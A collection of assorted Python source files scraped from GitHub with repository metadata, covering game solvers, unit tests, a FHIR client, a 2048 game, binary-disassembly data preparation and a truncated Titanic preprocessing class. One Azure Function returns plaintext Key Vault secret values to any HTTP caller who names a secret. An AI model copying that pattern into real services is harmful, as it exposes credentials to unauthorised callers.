linprog_solver_row(-value_matrix.T, precision)\n return policy, -value\n\n\ndef value_solve(value_matrix, precision=4):\n value_matrix = np.round(value_matrix, precision)\n _, value = cvxpot_solve_row(value_matrix)\n return value\n\n\ndef linprog_solve(value_matrix, precision=4):\n # rps = nash.Game(np.array(value_matrix))\n # eqs = rps.support_enumeration()\n value_matrix = np.round(value_matrix, precision)\n #py, value = cvxpot_solve_col(value_matrix)\n #px, v2 = cvxpot_solve_row(value_matrix)\n py, value = linprog_solver_col(value_matrix, precision)\n px, _ = linprog_solver_row(value_matrix, precision)\n for i, x in enumerate(px):\n if np.fabs(x) < 10e-6:\n px[i] = 0\n for i, y in enumerate(py):\n if np.fabs(y) < 10e-6:\n py[i] = 0\n px = np.divide(px, np.sum(px))\n py = np.divide(py, np.sum(py))\n # if np.sum(px) < 0.99 or np.sum(py) < 0.99:\n # print('divide error')\n # m, n = value_matrix.shape\n # return v2, np.divide(np.ones(m), m), np.divide(np.ones(n), n)\n\n # px = np.divide(px, np.sum(px))\n # px = np.nan_to_num(px)\n # py = np.divide(py, np.sum(py))\n # py = np.nan_to_num(py)\n # policy_x, policy_y = list(eqs)[0]\n # value = rps[policy_x,policy_y][0]\n return value, px, py\n\n\ndef cvxpot_solve_row(matrix):\n result = maxmin(matrix)['x']\n value = result[0]\n policy = np.array(result[1:]).reshape((-1,))\n return policy, value\n\n\ndef cvxpot_solve_col(matrix):\n return cvxpot_solve_row(-matrix.T)\n\n\ndef maxmin(A, solver='glpk'):\n solvers.options['show_progress'] = False\n solvers.options['refinement'] = 1\n\n num_vars = len(A)\n # minimize matrix c\n c = [-1] + [0 for i in range(num_vars)]\n c = np.array(c, dtype=\"float\")\n c = matrix(c)\n # constraints G*x <= h\n G = np.matrix(A, dtype=\"float\").T # reformat each variable is in a row\n G *= -1 # minimization constraint\n G = np.vstack([G, np.eye(num_vars) * -1]) # > 0 constraint for all vars\n new_col = [1 for i in range(num_vars)] + [0 for i in range(num_vars)]\n G = np.insert(G, 0, new_col, axis=1) # insert utility column\n G = matrix(G)\n h = ([0 for i in range(num_vars)] +\n [0 for i in range(num_vars)])\n h = np.array(h, dtype=\"float\")\n h = matrix(h)\n # contraints Ax = b\n A = [0] + [1 for i in range(num_vars)]\n A = np.matrix(A, dtype=\"float\")\n A = matrix(A)\n b = np.matrix(1, dtype=\"float\")\n b = matrix(b)\n sol = solvers.lp(c=c, G=G, h=h, A=A, b=b, solver=solver, options={'glpk': {'msg_lev': 'GLP_MSG_OFF'}}\n )\n return sol\n\n\ndef run():\n v = [\n [1., 2., 3.], [4., 5., 6.], [7., 8., 9.]\n ]\n v = np.array(v)\n # policy_x, value_x = __linprog_solver_row(v)\n # policy_y, value_y = __linprog_solver_col(v)\n start = time.time()\n # linv, linx, liny = linprog_solve(v)\n linx, linv = linprog_solver_row(v)\n liny, _ = linprog_solver_col(v)\n\n print(time.time() - start)\n start = time.time()\n\n px, value = cvxpot_solve_row(v)\n py, value = cvxpot_solve_col(v)\n px, value = cvxpot_solve_row(v*2)\n py, value = cvxpot_solve_col(v*2)\n px, value = cvxpot_solve_row(v*4)\n py, value = cvxpot_solve_col(v*4)\n px, value = cvxpot_solve_row(v*9)\n py, value = cvxpot_solve_col(v*9)\n px, value = cvxpot_solve_row(v*2.5)\n py, value = cvxpot_solve_col(v*2.5)\n print(time.time() - start)\n print('done')","repo_name":"qifanz/soft-nash-q2","sub_path":"util/matrix_game_solver.py","file_name":"matrix_game_solver.py","file_ext":"py","file_size_in_byte":5022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"3979051900","text":"# encoding=utf-8\n\nimport unittest\nfrom Roles.Role import Role, RoleCreatorWithLogger\nfrom Roles.Logger import Logger\nfrom six import with_metaclass\n\n__author__ = 'mochenx'\n\n\nclass UselessSubclassOfRole(with_metaclass(RoleCreatorWithLogger, Role, Logger)):\n index = 0\n\n def __init__(self, **kwargs):\n super(UselessSubclassOfRole, self).__init__(**kwargs)\n self.index = UselessSubclassOfRole.index\n UselessSubclassOfRole.index += 1\n\n def get_index(self):\n return self.index\n\n @classmethod\n def create(cls):\n return UselessSubclassOfRole()\n\n\nclass Grandfather(with_metaclass(RoleCreatorWithLogger, Role, Logger)):\n\n @classmethod\n def create(cls):\n return Grandfather()\n\n\nclass GrandMother(with_metaclass(RoleCreatorWithLogger, Role, Logger)):\n\n @classmethod\n def create(cls):\n return GrandMother()\n\n\nclass Father(Grandfather):\n\n def __init__(self, **kwargs):\n super(Father, self).__init__(**kwargs)\n\n @classmethod\n def create(cls):\n return Father()\n\n\nclass Son(Father):\n new_property_cnt = 0\n\n def __init__(self, **kwargs):\n super(Son, self).__init__(**kwargs)\n\n @classmethod\n def create(cls):\n if cls.new_property('age'):\n cls.new_property_cnt += 1\n if cls.new_property('score'):\n cls.new_property_cnt += 1\n return Son()\n\n\nclass UTRole(unittest.TestCase):\n def check_subclass_of_role(self, inst, klass):\n print('Checking all attributes of {0} and its instances to ensure '\n 'subclassing is done correctly'.format(klass.__name__))\n self.assertTrue(isinstance(inst, klass))\n self.assertTrue(issubclass(klass, Role))\n self.assertTrue(issubclass(klass, Logger))\n self.assertTrue(hasattr(inst, 'debug'))\n self.assertTrue(hasattr(inst, 'logger'))\n self.assertTrue(hasattr(inst, 'set_logger'))\n\n def test_register(self):\n useless_role = Role.get('UselessSubclassOfRole')\n role0 = Role.get('Grandfather')\n role1 = Role.get('GrandMother')\n role00 = Role.get('Father')\n role000 = Role.get('Son')\n\n self.check_subclass_of_role(useless_role, UselessSubclassOfRole)\n self.check_subclass_of_role(role0, Grandfather)\n self.check_subclass_of_role(role1, GrandMother)\n self.check_subclass_of_role(role00, Father)\n self.check_subclass_of_role(role000, Son)\n\n def test_get(self):\n duts = [Role.get('UselessSubclassOfRole') for _ in range(5)]\n for i, dut in enumerate(duts):\n print('Checking the {0} DUT whose index is {1}'.format(i, dut.get_index()))\n self.assertEqual(i, dut.get_index())\n\n def test_new_property(self):\n duts = [Role.get('Son') for _ in range(10)]\n dut = duts[0]\n self.assertTrue(hasattr(dut, 'age'))\n self.assertTrue(hasattr(dut, 'score'))\n self.assertIsNone(dut.age)\n self.assertIsNone(dut.score)\n dut.age = 10\n dut.score = 99\n self.assertEqual(dut.age, 10)\n self.assertEqual(dut.score, 99)\n self.assertEqual(dut._age, 10)\n self.assertEqual(dut._score, 99)\n print('Age: {0}, Score: {1}'.format(dut.age, dut.score))\n dut._age = 11\n dut._score = 98\n self.assertEqual(dut.age, 11)\n self.assertEqual(dut.score, 98)\n print('Age: {0}, Score: {1}'.format(dut.age, dut.score))\n self.assertEqual(dut.new_property_cnt, 2)\n print('new_property in class has been called {0} times'.format(dut.new_property_cnt))\n\n\n\n","repo_name":"Mochenx/Anteater","sub_path":"UTs/UTRole.py","file_name":"UTRole.py","file_ext":"py","file_size_in_byte":3586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"18529006349","text":"import urllib.request\nimport json\nimport fhirclient.models.bundle as b\nimport fhirclient.models.patient as p\nimport fhirclient.models.observation as o\nimport fhirclient.models.medicationstatement as ms\nclass Client:\n\n def getPatientById(self,id):\n url =\"http://hapi.fhir.org/baseDstu3/Patient/\"+str(id)\n contents = urllib.request.urlopen(url).read()\n js = json.loads(contents.decode(\"utf-8\"))\n return p.Patient(js)\n def getObservationById(self,id):\n url =\"http://hapi.fhir.org/baseDstu3/Observation/\"+str(id)\n contents = urllib.request.urlopen(url).read()\n js = json.loads(contents.decode(\"utf-8\"))\n return o.Observation(js)\n def getMedicationStatement(self,id):\n url =\"http://hapi.fhir.org/baseDstu3/MedicationStatement/\"+str(id)\n contents = urllib.request.urlopen(url).read()\n js = json.loads(contents.decode(\"utf-8\"))\n return ms.MedicationStatement(js)\n def getAllPatients(self,count=7,offset=3,family=\"\"):\n contents = urllib.request.urlopen(\"http://hapi.fhir.org/baseDstu3/Patient?family=\" + str(family) + \"&_getpagesoffset=\" + str(offset) + \"&_count=\" + str(count) + \"&_pretty=true\").read()\n js = json.loads(contents.decode(\"utf-8\"))\n bundle = b.Bundle(js)\n patients = []\n if(bundle.entry is None):\n return []\n for entry in bundle.entry:\n patients.append(entry.resource)\n return patients\n def getItemsForPatient(self,id,what=\"MedicationStatement\"):\n url =\"http://hapi.fhir.org/baseDstu3/\"+what+\"?patient=\"+str(id)+\"&_pretty=true\"\n contents = urllib.request.urlopen(url).read()\n js = json.loads(contents.decode(\"utf-8\"))\n bundle = b.Bundle(js)\n items =[ ]\n if(bundle.entry is None):\n return []\n for entry in bundle.entry:\n items.append(entry.resource)\n return items\n","repo_name":"mlynarzsrem/IWM","sub_path":"Karta pacjenta/Client.py","file_name":"Client.py","file_ext":"py","file_size_in_byte":1918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"9276767400","text":"import unittest\n\nfrom python.src.y2020.dec02 import Dec02\n\n\nclass TestDec02(unittest.TestCase):\n data = [\n \"1-3 a: abcde\",\n \"1-3 b: cdefg\",\n \"2-9 c: ccccccccc\"\n ]\n\n def test_old_policy(self):\n d = Dec02(instructions=self.data)\n self.assertEqual(2, d.part_1())\n\n def test_new_policy(self):\n d = Dec02(instructions=self.data)\n self.assertEqual(1, d.part_2())\n","repo_name":"prositen/advent-of-code","sub_path":"python/test/y2020/test_dec02.py","file_name":"test_dec02.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"5"} +{"seq_id":"15168084808","text":"import logging\nimport json\n\nimport azure.functions as func\nfrom azure.keyvault.secrets import SecretClient\nfrom azure.identity import DefaultAzureCredential\n\n\ndef main(req: func.HttpRequest) -> func.HttpResponse:\n logging.info('Python HTTP trigger function processed a request.')\n name = req.params.get('name')\n if not name:\n return func.HttpResponse(\"Bad request you need to pass name\", status_code=400)\n credential = DefaultAzureCredential()\n logging.info('DefaultAzureCredential')\n kv = \"VaronisAssignmentKv01\", \"VaronisAssignmentKv02\", \"VaronisAssignmentKv03\"\n response = []\n for keyVaultName in kv:\n KVUri = f\"https://{keyVaultName}.vault.azure.net\"\n client = SecretClient(vault_url=KVUri, credential=credential)\n try:\n data = client.get_secret(name)\n response.append({'keyVaultName': keyVaultName, 'secretName': name, 'secretValue': data.value,\n 'createdOn': data.properties.created_on.isoformat()})\n logging.info(\n f'Keyvault Name: {keyVaultName}\\nSecret name: {name}\\nSecret value: {data.value}\\nSecret created on: {data.properties.created_on}\\n')\n except Exception as e:\n response.append({'keyVaultName': keyVaultName, 'secretName': name, 'error': str(e)})\n client.close()\n return func.HttpResponse(json.dumps(response))\n","repo_name":"karolgkrupa/VaronisTest","sub_path":"2/pythonSecret/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"70676771919","text":"#! /usr/bin/python\n# -*- coding:utf-8 -*-\n\n# 进行数据处理,根据操作进行数据转换\n\nimport random as r\nimport sys\n\nsquare = (2, 2, 2, 4)\n\n\ndef prime_data():\n # 起始布局\n data = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n pp = r.choice(square)\n pp1 = r.choice(square)\n location = r.sample([i for i in range(16)], 2)\n data[location[0]] = pp\n data[location[1]] = pp1\n return data\n\n\ndef tran_data(data, n):\n # 根据操转换为4个小数据列表\n # 操作的反向为底边 zero\n small_list = []\n # print(data)\n if n == 0: # 向上操作\n for i in range(4):\n zero = [data[i], data[i + 4], data[i + 8], data[i + 12]]\n small_list.append(zero)\n elif n == 1: # 向右操作\n zero = data[0:4][::-1]\n one = data[4:8][::-1]\n two = data[8:12][::-1]\n three = data[12:16][::-1]\n small_list = [three, two, one, zero]\n elif n == 2: # 向下操作\n for i in range(12, 16):\n zero = [data[i], data[i - 4], data[i - 8], data[i - 12]]\n small_list.append(zero)\n elif n == 3: # 向左操作\n zero = data[:4]\n one = data[4:8]\n two = data[8:12]\n three = data[12:]\n small_list = [three, two, one, zero]\n return small_list\n\n\ndef add_number(data, n):\n # 数据处理函数\n lis = []\n small_list = tran_data(data, n)\n for p in small_list:\n try:\n for x in range(4):\n p.remove(0)\n except ValueError:\n pass\n while True:\n s = len(p)\n if s < 4:\n p.append(0)\n else:\n break\n if p[0] == p[1]:\n if p[2] == p[3]:\n p[0] += p[1]\n p[1] = p[2] + p[3]\n p[2], p[3] = 0, 0\n else:\n p[0] += p[1]\n p[1], p[2], p[3] = p[2], p[3], 0\n elif p[2] == p[1]:\n p[1] += p[2]\n p[2], p[3] = p[3], 0\n elif p[2] == p[3]:\n p[2] += p[3]\n p[3] = 0\n lis.append(p)\n data = tran_list(lis, n)\n return data\n\n\ndef tran_list(small_list, n):\n big_list = []\n if n == 0:\n for x in range(4):\n for i in range(4):\n big_list.append(small_list[i][x])\n elif n == 1:\n for i in [3, 2, 1, 0]:\n s = small_list[i][::-1]\n for x in s:\n big_list.append(x)\n\n elif n == 2:\n for x in range(4):\n for i in [3, 2, 1, 0]:\n big_list.append(small_list[i][x])\n big_list = big_list[::-1]\n elif n == 3:\n for i in [3, 2, 1, 0]:\n for x in small_list[i]:\n big_list.append(x)\n\n return big_list\n\n\ndef judgement(big_list):\n # 生成并修改数据\n s = []\n for i in range(16):\n if not big_list[i]:\n p = i\n s.append(p)\n try:\n l = r.choice(square)\n z = r.choice(s)\n except (ValueError, IndexError):\n s = input(\"游戏结束,请按任意键退出\")\n raise NameError(\" 游戏结束!\")\n big_list[z] = l\n return big_list\n\n\ndef data_handle(data):\n n = input(\"W A S D(上下左右)--->\")\n if len(n) > 1:\n n = n[-1]\n if n in (\"w\"):\n # 向上划\n data = add_number(data, 0)\n elif n in (\"d\"):\n # 向右划\n data = add_number(data, 1)\n elif n in (\"s\"):\n # 向下划\n data = add_number(data, 2)\n elif n in (\"a\"):\n # 向左划\n data = add_number(data, 3)\n elif n in \"q\":\n raise OSError\n else:\n raise StopIteration(\"请输入正确操作\")\n data = judgement(data)\n return data # 返回数据给游戏界面\n\n\ndef read_data(filename=\"archive.txt\"):\n s = []\n try:\n file = open(filename)\n for i in file:\n p = i.strip()\n pp = int(p)\n s.append(pp)\n file.close()\n except OSError:\n print(\"文件打开失败\")\n return s\n\n\ndef save_data(data, filename=\"archive.txt\"):\n try:\n file = open(filename, \"w\")\n for i in data:\n file.write(str(i))\n file.write(\"\\n\")\n file.close()\n except OSError:\n print(\"文件打开错误\")\n\n","repo_name":"Laurel-rao/csdn_demo","sub_path":"game_2048/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":4303,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"14472071602","text":"import math\n\nfrom .shapes import PolygonShape\n\n\nclass Triangle(PolygonShape):\n def __init__(self, *sides: list):\n if not all(isinstance(side, (int, float)) for side in sides):\n raise ValueError(\"Sides must be only of type int or float.\")\n if len(sides) != 3:\n raise ValueError(\"Triangle must have 3 sides.\")\n if sides[0] <= 0 or sides[1] <= 0 or sides[2] <= 0:\n raise ValueError(\"Sides must be positive numbers.\")\n if (\n sides[0] >= sides[1] + sides[2]\n or sides[1] >= sides[0] + sides[2]\n or sides[2] >= sides[0] + sides[1]\n ):\n raise ValueError(\n \"Sum of two sides of a triangle must be greater than third side.\"\n )\n super().__init__(*sides)\n\n @property\n def two_smaller_sides(self):\n if self.max_side:\n return [side for side in self.all_sides if side != self.max_side]\n\n @property\n def is_right_triangle(self):\n if self.max_side:\n return self.max_side**2 == sum(\n side**2 for side in self.two_smaller_sides\n )\n else:\n return False\n\n @property\n def area(self):\n if self.is_right_triangle:\n return math.prod(self.two_smaller_sides) / 2\n return math.sqrt(\n self.semiperimeter\n * (self.semiperimeter - self.all_sides[0])\n * (self.semiperimeter - self.all_sides[1])\n * (self.semiperimeter - self.all_sides[2])\n )\n","repo_name":"Aleksandr-Mamonov/geometry_lib","sub_path":"geometry_lib/triangle.py","file_name":"triangle.py","file_ext":"py","file_size_in_byte":1533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"3378207548","text":"import glob\nimport json\nimport os\nimport random\nimport re\nimport sys\nimport argparse\n\nfrom capstone import *\nfrom elftools.elf.elffile import ELFFile\n\n# from command import params\nclass params:\n fields = ['static', 'inst_emb', 'inst_pos_emb', 'arch_emb', 'byte1', 'byte2', 'byte3', 'byte4', 'arg_info']\n\ndef tokenize(s):\n s = s.replace(',', ' , ')\n s = s.replace('[', ' [ ')\n s = s.replace(']', ' ] ')\n s = s.replace(':', ' : ')\n s = s.replace('*', ' * ')\n s = s.replace('(', ' ( ')\n s = s.replace(')', ' ) ')\n s = s.replace('{', ' { ')\n s = s.replace('}', ' } ')\n s = s.replace('#', '')\n s = s.replace('$', '')\n s = s.replace('!', ' ! ')\n\n s = re.sub(r'-(0[xX][0-9a-fA-F]+)', r'- \\1', s)\n s = re.sub(r'-([0-9a-fA-F]+)', r'- \\1', s)\n\n return s.split()\n\n\ndef get_function_reps(die, mapping):\n functions = []\n for child_die in die.iter_children():\n\n if child_die.tag.split('_')[-1] == 'subprogram':\n function = {}\n try:\n function['start_addr'] = child_die.attributes['DW_AT_low_pc'][2]\n function['end_addr'] = function['start_addr'] + child_die.attributes['DW_AT_high_pc'][2]\n function['name'] = child_die.attributes['DW_AT_name'][2].decode('utf-8')\n functions.append(function)\n except KeyError:\n continue\n\n return functions\n\n\ndef get_type(type_str, agg):\n\n if '*' in type_str:\n return get_type(type_str.replace('*', ''), agg)+'*'\n elif '[' in type_str and ']' in type_str:\n return 'array'\n elif agg['is_enum']:\n return 'enum'\n elif agg['is_struct']:\n return 'struct'\n elif agg['is_union']:\n return 'union'\n elif 'void' in type_str:\n return 'void'\n\n elif 'float' in type_str:\n return 'float'\n elif 'long' in type_str and 'double' in type_str:\n return 'long double'\n elif 'double' in type_str:\n return 'double'\n\n elif 'char' in type_str:\n if 'u' in type_str:\n return 'unsigned char'\n return 'signed char'\n elif 'short' in type_str:\n if 'u' in type_str:\n return 'unsigned short'\n return 'signed short'\n elif 'int' in type_str:\n if 'u' in type_str:\n return 'unsigned int'\n return 'signed int'\n elif 'longlong' in type_str:\n if 'u' in type_str:\n return 'unsigned long long'\n return 'signed long long'\n elif 'long' in type_str:\n if 'u' in type_str:\n return 'unsigned long'\n return 'signed long'\n\n elif 'undefined' in type_str:\n return 'undefined'\n\n print(type_str)\n return '?you shouldnt be seeing this?'\n\n\ndef test_hex(s):\n try: \n int(s)\n return True\n except ValueError:\n return False\n\n\ndef get_reg(tokens):\n if tokens[-1] == ']' or test_hex(tokens[-1]):\n register = tokens[1].upper()\n else:\n register = tokens[-1].upper()\n return register\n\n\n# gets the type of an instruction that has a stack xref\ndef get_ds_loc(loc_dict, address, funcname):\n for var in loc_dict[funcname]:\n if address in [int(i, 16) for i in loc_dict[funcname][var]['addresses']]:\n return get_type(loc_dict[funcname][var]['type'], loc_dict[funcname][var]['agg'])\n return 'no-access'\n\n\n# gets the type of an argument using the register name where it's stored\ndef get_arg_stack_loc(loc_dict, register, funcname):\n for var in loc_dict[funcname]:\n if ('register' in loc_dict[funcname][var] \n and register == loc_dict[funcname][var]['register']):\n return get_type(loc_dict[funcname][var]['type'], loc_dict[funcname][var]['agg'])\n return 'undefined'\n\n\n# gets overall argument info for each function\ndef get_arg_info(loc_dict, funcname):\n arg_list = []\n for var in loc_dict[funcname]:\n if 'register' in loc_dict[funcname][var].keys():\n arg_list.append((loc_dict[funcname][var]['count'], get_type(loc_dict[funcname][var]['type'], loc_dict[funcname][var]['agg'])))\n arg_list.sort()\n leng = str(len(arg_list))\n\n while len(arg_list) < 3:\n arg_list.append('##')\n arg_list = [arg_type for (order, arg_type) in arg_list]\n\n return [leng] + arg_list[:3]\n\n\ndef hex2str(s, b_len=8):\n num = s.replace('0x', '')\n\n # handle 64-bit cases, we choose the lower 4 bytes, thus 8 numbers\n if len(num) > b_len:\n num = num[-b_len:]\n\n num = '0' * (b_len - len(num)) + num\n return num\n\n\ndef byte2seq(value_list):\n return [value_list[i:i + 2] for i in range(len(value_list) - 2)]\n\n\nparser = argparse.ArgumentParser(description='Output ground truth')\nparser.add_argument('--output_dir', type=str, nargs=1,\n help='where ground truth is output')\nparser.add_argument('--input_dir', type=str, nargs=1,\n help='directory where input binaries are')\nparser.add_argument('--stack_dir', type=str, nargs=1,\n help='where the stack files are (same as argument for get_var_loc.py')\nparser.add_argument('--arch', type=str, nargs=1,\n help='architecture of binary')\n\nargs = parser.parse_args()\n\noutput_dir = args.output_dir[0]\ninput_dir = args.input_dir[0]\nstack_dir = args.stack_dir[0]\n\nif not os.path.exists(output_dir):\n os.makedirs(output_dir)\n\ntrain_file = {field: open(os.path.join(output_dir, f'train.{field}'), 'w') for field in params.fields}\nvalid_file = {field: open(os.path.join(output_dir, f'valid.{field}'), 'w') for field in params.fields}\n\ntrain_label = open(os.path.join(output_dir, 'train.label'), 'w')\nvalid_label = open(os.path.join(output_dir, 'valid.label'), 'w')\n\nfile_list = glob.glob(os.path.join(input_dir, '*'), recursive=True)\n# filename = 'command/ghidra/ds_test_dwarf'\n\nfor filename in file_list:\n # load data structure information from ghidra\n with open(os.path.join(stack_dir, f'{os.path.basename(filename)}_stacks'), 'r') as f:\n loc_dict = json.loads(f.read())\n\n with open(filename, 'rb') as f:\n elffile = ELFFile(f)\n dwarf = elffile.get_dwarf_info()\n\n # disassemble the byte code with capstone\n code = elffile.get_section_by_name('.text')\n opcodes = code.data()\n addr = code['sh_addr']\n md = Cs(CS_ARCH_X86, CS_MODE_64)\n\n for CU in dwarf.iter_CUs():\n function_reps = get_function_reps(CU.get_top_DIE(), None)\n\n for func in function_reps:\n start_addr = func['start_addr']\n end_addr = func['end_addr']\n\n func_args = {}\n used_regs = set()\n\n # input\n static = []\n inst_pos = []\n op_pos = []\n arch = []\n byte1 = []\n byte2 = []\n byte3 = []\n byte4 = []\n\n # output\n labels = []\n\n inst_pos_counter = 0\n\n try:\n for address, size, op_code, op_str in md.disasm_lite(opcodes, addr):\n\n if start_addr <= address < end_addr:\n tokens = tokenize(f'{op_code} {op_str}')\n label = get_ds_loc(loc_dict, address, func['name'])\n\n # get the register and stack location for likely arg vars from the \n # op_str and label the instruction by using the register->param type\n # mapping from Ghidra. A mapping of stack location -> type is stored\n # for whenever else the location is seen.\n if label == 'undefined' and '[' in tokens and op_code == 'mov':\n reg = get_reg(tokens)\n\n loc = op_str[op_str.find(\"[\")+1:op_str.find(\"]\")]\n if loc in func_args:\n label = func_args[loc]\n\n else:\n label = get_arg_stack_loc(loc_dict, reg, func['name'])\n func_args[loc] = label\n\n for i, token in enumerate(tokens):\n if '0x' in token.lower():\n static.append('hexvar')\n bytes = byte2seq(hex2str(token.lower()))\n byte1.append(bytes[0])\n byte2.append(bytes[1])\n byte3.append(bytes[2])\n byte4.append(bytes[3])\n\n elif token.lower().isdigit():\n static.append('num')\n bytes = byte2seq(hex2str(hex(int(token.lower()))))\n byte1.append(bytes[0])\n byte2.append(bytes[1])\n byte3.append(bytes[2])\n byte4.append(bytes[3])\n \n else:\n static.append(token)\n byte1.append('##')\n byte2.append('##')\n byte3.append('##')\n byte4.append('##')\n\n inst_pos.append(str(inst_pos_counter))\n op_pos.append(str(i))\n arch.append(args.arch[0])\n\n labels.append(label)\n\n inst_pos_counter += 1\n\n # print(str(address) + \"\\t\"+ label+ \"\\t\"+ op_code + \"\\t\"+ op_str )\n\n except CsError as e:\n print(\"ERROR: %s\" % e)\n\n\n arg_info = get_arg_info(loc_dict, func['name'])\n\n # skip invalid functions\n if len(labels) < 30 or len(labels) > 510 or len(set(labels)) == 1:\n continue\n\n if not random.random() < 0.1:\n train_file[params.fields[0]].write(' '.join(static) + '\\n')\n train_file[params.fields[1]].write(' '.join(inst_pos) + '\\n')\n train_file[params.fields[2]].write(' '.join(op_pos) + '\\n')\n train_file[params.fields[3]].write(' '.join(arch) + '\\n')\n train_file[params.fields[4]].write(' '.join(byte1) + '\\n')\n train_file[params.fields[5]].write(' '.join(byte2) + '\\n')\n train_file[params.fields[6]].write(' '.join(byte3) + '\\n')\n train_file[params.fields[7]].write(' '.join(byte4) + '\\n')\n train_file[params.fields[8]].write(' '.join(arg_info) + '\\n')\n\n train_label.write(' '.join(labels) + '\\n')\n\n\n else:\n valid_file[params.fields[0]].write(' '.join(static) + '\\n')\n valid_file[params.fields[1]].write(' '.join(inst_pos) + '\\n')\n valid_file[params.fields[2]].write(' '.join(op_pos) + '\\n')\n valid_file[params.fields[3]].write(' '.join(arch) + '\\n')\n valid_file[params.fields[4]].write(' '.join(byte1) + '\\n')\n valid_file[params.fields[5]].write(' '.join(byte2) + '\\n')\n valid_file[params.fields[6]].write(' '.join(byte3) + '\\n')\n valid_file[params.fields[7]].write(' '.join(byte4) + '\\n')\n valid_file[params.fields[8]].write(' '.join(arg_info) + '\\n')\n\n valid_label.write(' '.join(labels) + '\\n')\n\nfor k in train_file:\n train_file[k].close()\nfor k in valid_file:\n valid_file[k].close()\ntrain_label.close()\nvalid_label.close()\n","repo_name":"CUMLSec/stateformer","sub_path":"command/finetune/prepare_finetune_complete.py","file_name":"prepare_finetune_complete.py","file_ext":"py","file_size_in_byte":11910,"program_lang":"python","lang":"en","doc_type":"code","stars":56,"dataset":"github-code","pt":"29"} +{"seq_id":"21767892205","text":"#!/usr/bin/python3\nimport os\nimport time\n\nr, w = os.pipe()\n\npid = os.fork()\n\nif pid:\n print(\"I'm processsss: \", os.getpid(), \" and my father is: \", os.getppid())\n os.close(w)\n r = os.fdopen(r)\n print('P: leyendo')\n string = r.readline()\n print('P text = ', string)\n os.wait()\n exit()\nelse:\n print(\"I'm process: \", os.getpid(), \" and my father is: \", os.getppid())\n os.close(r)\n w = os.fdopen(w, 'w')\n print('H: escribiendo ')\n w.write('Texto escrito por el hijo\\n')\n w.close()\n print('H: hijo cerrado')\n exit()\n","repo_name":"fisaguirre/UM-Computacion2-2023","sub_path":"Clases/clase-5-FIFO/ejemplos/ejemplo2.py","file_name":"ejemplo2.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"40135586041","text":"class Solution:\n def twoSum(self, nums: List[int], target: int) -> List[int]:\n map = {}\n res = []\n for i in range(len(nums)):\n diff = target - nums[i]\n if nums[i] not in map:\n map[diff] = i\n else:\n res.append(map[nums[i]])\n res.append(i)\n\n return res","repo_name":"sumeetparekh94/Leetcode_Questions","sub_path":"two_sum_1.py","file_name":"two_sum_1.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"15476401770","text":"\"\"\"Some useful functions.\"\"\"\n\nimport os\nimport time\nimport shutil\n\n\nclass Timer:\n \"\"\"Timer. Use get() method to get how much time has passed since this\n object creation.\"\"\"\n\n def __init__(self):\n self.time = time.clock()\n\n def get(self):\n \"\"\"Returns how much time has passed since this object creation.\"\"\"\n return round(time.clock() - self.time, 2)\n\n\ndef copytree(source, destination):\n \"\"\"Same as shutil.copytree(), but can copy to already existing directory.\"\"\"\n\n if not os.path.exists(destination):\n os.makedirs(destination)\n\n for item in os.listdir(source):\n s = os.path.join(source, item)\n d = os.path.join(destination, item)\n\n if os.path.isdir(s):\n shutil.copytree(s, d)\n else:\n shutil.copy2(s, d)","repo_name":"lecnim/stado","sub_path":"stado/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"29"} +{"seq_id":"1600101335","text":"from sklearn.model_selection import train_test_split\nimport numpy as np\nimport pandas as pd\nimport math\nfrom sklearn.preprocessing import MinMaxScaler\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom helpers.DataframeHelper import DataframeHelper\n\nclass DataProcessing(object):\n\n @staticmethod\n def run_complete_pipeline_transformations(data_csv, is_training):\n DataProcessing.describe_input_csv(data_csv)\n DataProcessing.transform_csv_preprocessing(data_csv, is_training)\n DataProcessing.transform_csv_create_title(data_csv)\n DataProcessing.transform_csv_generate_missing_age(data_csv)\n DataProcessing.transform_csv_process_embarked(data_csv)\n DataProcessing.transform_csv_categorical_values(data_csv)\n DataProcessing.transform_csv_scale_to_one(data_csv)\n csv_processed = DataProcessing.transform_csv_postprocess(data_csv)\n DataProcessing.perform_visual_analysis(csv_processed)\n return csv_processed\n\n @staticmethod\n def describe_input_csv(data):\n print(data.describe(include='all'))\n print(data.describe(include=['O']))\n print(data.isnull().sum())\n print('-----------------------------------------------------')\n\n @staticmethod\n def transform_csv_scale_to_one(data):\n scaler = MinMaxScaler()\n data['NameLength'] = scaler.fit_transform(data[['NameLength']])\n data['Pclass'] = scaler.fit_transform(data[['Pclass']])\n data['Fare'] = scaler.fit_transform(data[['Fare']])\n data['Age'] = scaler.fit_transform(data[['Age']])\n data['Title'] = scaler.fit_transform(data[['Title']])\n data['Embarked'] = scaler.fit_transform(data[['Embarked']])\n\n @staticmethod\n def transform_csv_preprocessing(data, isTraining):\n if isTraining == True:\n data.rename(columns={'Survived': 'class'}, inplace=True) # tpot needs this as Y\n\n data['Sex'] = data['Sex'].map({'male': 0, 'female': 1})\n data['Embarked'] = data['Embarked'].map({'S': 0, 'C': 1, 'Q': 2})\n data['FamilySize'] = data['SibSp'] + data['Parch'] + 1\n data['IsAlone'] = 0\n data.loc[data['FamilySize'] == 1, 'IsAlone'] = 1\n data['NameLength'] = 